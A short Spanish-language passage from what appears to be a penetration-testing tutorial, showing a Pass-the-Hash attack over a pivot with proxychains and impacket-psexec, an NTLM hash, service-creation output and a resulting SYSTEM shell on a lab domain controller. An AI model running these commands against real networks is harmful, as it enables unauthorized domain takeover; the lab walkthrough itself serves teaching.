PassTheHash sobre pivoting utilizando SMB utilizando PsExec

Procedemos a realizar el Pass The Hash con IMPACKET:

kali@kali> proxychains impacket-psexec spartancybersec.corp/Administrador@172.16.1.7 -hashes :643cab011612f2e847a149e17ffb4df6
[*] Requesting shares on 172.16.1.7.....
[*] Found writable share ADMIN$
[*] Uploading file GQVMgRnY.exe
[*] Opening SVCManager on 172.16.1.7.....
[*] Creating service LYTw on 172.16.1.7.....
[*] Starting service LYTw.....
[!] Press help for extra shell commands

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
Spartan-DC

En la evidencia previa, podemos afirmar que hemos logrado comprometer este servidor con el usuario administrador utilizando ZeroLogon y el acceso fue por medio de PsExec sobre Pivoting.

PreviousFundamentos de PsExec NextEnumeracion de Active Directory usando PowerView.ps1

Last updated 1 year ago